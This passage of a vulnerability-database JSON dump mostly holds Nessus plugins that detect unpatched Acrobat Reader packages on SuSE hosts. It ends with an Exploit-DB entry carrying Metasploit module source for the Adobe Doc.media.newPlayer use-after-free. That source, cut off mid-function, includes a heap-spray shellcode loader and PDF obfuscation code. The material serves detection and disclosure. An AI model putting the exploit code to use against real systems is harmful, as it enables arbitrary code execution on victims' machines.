obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"acroread-9.3-0.5.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:14:25", "bulletinFamily": "scanner", "description": "Specially crafted PDF files could crash acroread. Attackers could exploit that to potentially execute arbitrary code. (CVE-2009-3953 / CVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 / CVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)", "modified": "2016-12-22T00:00:00", "id": "SUSE_ACROREAD_JA-6804.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=51710", "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6804)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51710);\n script_version (\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2016/12/22 20:32:44 $\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6804)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3957.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3958.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6804.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread_ja-9.3-0.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:13:01", "bulletinFamily": "scanner", "description": "Specially crafted PDF files could crash acroread. Attackers could exploit that to potentially execute arbitrary code. (CVE-2009-3953 / CVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 / CVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)", "modified": "2016-12-21T00:00:00", "id": "SUSE_11_ACROREAD_JA-100128.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44377", "published": "2010-02-02T00:00:00", "title": "SuSE 11 Security Update : acroread_ja (SAT Patch Number 1881)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44377);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:21:19 $\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"SuSE 11 Security Update : acroread_ja (SAT Patch Number 1881)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564742\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3957.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3958.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 1881.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread_ja\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread_ja-9.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:13:00", "bulletinFamily": "scanner", "description": "Specially crafted PDF files could crash acroread. Attackers could exploit that to potentially execute arbitrary code (CVE-2009-3953, CVE-2009-3954, CVE-2009-3955, CVE-2009-3956, CVE-2009-3957, CVE-2009-3958, CVE-2009-3959, CVE-2009-4324).\n\nAcrobat reader was updated to version 9.3 to fix those security issues.", "modified": "2016-12-21T00:00:00", "id": "SUSE_11_0_ACROREAD-100122.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44124", "published": "2010-01-25T00:00:00", "title": "openSUSE Security Update : acroread (acroread-1849)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-1849.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44124);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:09:49 $\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"openSUSE Security Update : acroread (acroread-1849)\");\n script_summary(english:\"Check for the acroread-1849 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code (CVE-2009-3953,\nCVE-2009-3954, CVE-2009-3955, CVE-2009-3956, CVE-2009-3957,\nCVE-2009-3958, CVE-2009-3959, CVE-2009-4324).\n\nAcrobat reader was updated to version 9.3 to fix those security\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564742\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-9.3-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:13:00", "bulletinFamily": "scanner", "description": "Specially crafted PDF files could crash acroread. Attackers could exploit that to potentially execute arbitrary code (CVE-2009-3953, CVE-2009-3954, CVE-2009-3955, CVE-2009-3956, CVE-2009-3957, CVE-2009-3958, CVE-2009-3959, CVE-2009-4324).\n\nAcrobat reader was updated to version 9.3 to fix those security issues.", "modified": "2016-12-21T00:00:00", "id": "SUSE_11_1_ACROREAD-100122.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44126", "published": "2010-01-25T00:00:00", "title": "openSUSE Security Update : acroread (acroread-1849)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-1849.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44126);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:09:51 $\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"openSUSE Security Update : acroread (acroread-1849)\");\n script_summary(english:\"Check for the acroread-1849 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code (CVE-2009-3953,\nCVE-2009-3954, CVE-2009-3955, CVE-2009-3956, CVE-2009-3957,\nCVE-2009-3958, CVE-2009-3959, CVE-2009-4324).\n\nAcrobat reader was updated to version 9.3 to fix those security\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564742\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-9.3-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T06:06:32", "bulletinFamily": "exploit", "description": "Adobe Doc.media.newPlayer Use After Free Vulnerability. CVE-2009-4324. Local exploit for windows platform", "modified": "2010-09-25T00:00:00", "published": "2010-09-25T00:00:00", "id": "EDB-ID:16623", "href": "https://www.exploit-db.com/exploits/16623/", "type": "exploitdb", "title": "Adobe Doc.media.newPlayer Use After Free Vulnerability", "sourceData": "##\r\n# $Id: adobe_media_newplayer.rb 10477 2010-09-25 11:59:02Z mc $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Doc.media.newPlayer Use After Free Vulnerability',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat\r\n\t\t\t\tProfessional versions up to and including 9.2.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'unknown', # Found in the wild\r\n\t\t\t\t\t# Metasploit version by:\r\n\t\t\t\t\t'hdm',\r\n\t\t\t\t\t'pusscat',\r\n\t\t\t\t\t'jduck'\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10477 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-4324' ],\r\n\t\t\t\t\t[ 'BID', '37331' ],\r\n\t\t\t\t\t[ 'OSVDB', '60980' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops'\t => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# test results (on Windows XP SP3)\r\n\t\t\t\t\t# reader 6.0.1 - vulnerable / doesn't work\r\n\t\t\t\t\t# reader 7.0.5 - untested\r\n\t\t\t\t\t# reader 7.0.8 - untested\r\n\t\t\t\t\t# reader 7.0.9 - vulnerable / doesn't work\r\n\t\t\t\t\t# reader 7.1.0 - untested\r\n\t\t\t\t\t# reader 7.1.1 - untested\r\n\t\t\t\t\t# reader 8.0.0 - untested\r\n\t\t\t\t\t# reader 8.1.1 - works\r\n\t\t\t\t\t# reader 8.1.2 - untested\r\n\t\t\t\t\t# reader 8.1.3 - untested\r\n\t\t\t\t\t# reader 8.1.4 - untested\r\n\t\t\t\t\t# reader 8.1.5 - untested\r\n\t\t\t\t\t# reader 8.1.6 - untested\r\n\t\t\t\t\t# reader 9.0.0 - untested\r\n\t\t\t\t\t# reader 9.1.0 - works\r\n\t\t\t\t\t# reader 9.2 - works (no debugger, no DEP)\r\n\t\t\t\t\t[ 'Adobe Reader Windows English (JS Heap Spray)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Size'\t\t=> (0x10000/2),\r\n\t\t\t\t\t\t\t'Ret' => 0x0c0c0c0c,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Adobe Reader Windows German (JS Heap Spray)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Size'\t\t=> (0x10000/2),\r\n\t\t\t\t\t\t\t'Ret' => 0x0a0a0a0a,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Dec 14 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\t# Encode the shellcode.\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Make some nops\r\n\t\tnops = Rex::Text.to_unescape([target.ret].pack('V'))\r\n\r\n\t\t# Randomize variables\r\n\t\t#\r\n\t\tlen = 72\r\n\t\trand1 = rand_text_alpha(rand(100) + 1)\r\n\t\trand2 = rand_text_alpha(rand(100) + 1)\r\n\t\trand3 = rand_text_alpha(rand(100) + 1)\r\n\t\trand4 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\\\\\' + '\\1')\r\n\t\trand5 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\\\\\' + '\\1')\r\n\r\n\t\tvtbuf = [target.ret].pack('V') * 4\r\n\t\tvtbuf << rand_text_alpha(len - vtbuf.length)\r\n\t\tvtbuf.gsub!(/([dhHjmMsty])/m, '\\\\\\\\' + '\\1')\r\n\t\tretstring = Rex::Text.to_unescape(vtbuf)\r\n\r\n\t\t# The printd strings are 72 bytes (??)\r\n\t\tscript = %Q|\r\nvar #{rand1} = unescape(\"#{shellcode}\");\r\nvar #{rand2} = unescape(\"#{nops}\");\r\nvar #{rand3} = unescape(\"#{retstring}\");\r\n\r\nwhile(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};\r\n\t#{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);\r\n\r\nmemory=new Array();\r\n\r\nfor(i=0;i<0x2000;i++) {\r\n\tmemory[i]= #{rand2} + #{rand1};\r\n}\r\n\r\nutil.printd(\"#{rand4}\", new Date());\r\nutil.printd(\"#{rand5}\", new Date());\r\ntry {this.media.newPlayer(null);} catch(e) {}\r\nutil.printd(#{rand3}, new Date());\r\n|\r\n\r\n\t\t# Create the pdf\r\n\t\tpdf = make_pdf(script)\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file...\")\r\n\r\n\t\tfile_create(pdf)\r\n\r\n\tend\r\n\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = \"\"\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t\"%d 0 obj\" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t\"%d 0 R\" % id\r\n\tend\r\n\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\tresult = \"\"\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << \"#%x\" % c.unpack(\"C*\")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = \"\"\r\n\t\twhitespace = \"\"\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << \"%02x\" % b\r\n\t\t\twhitespace = \" \" * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << 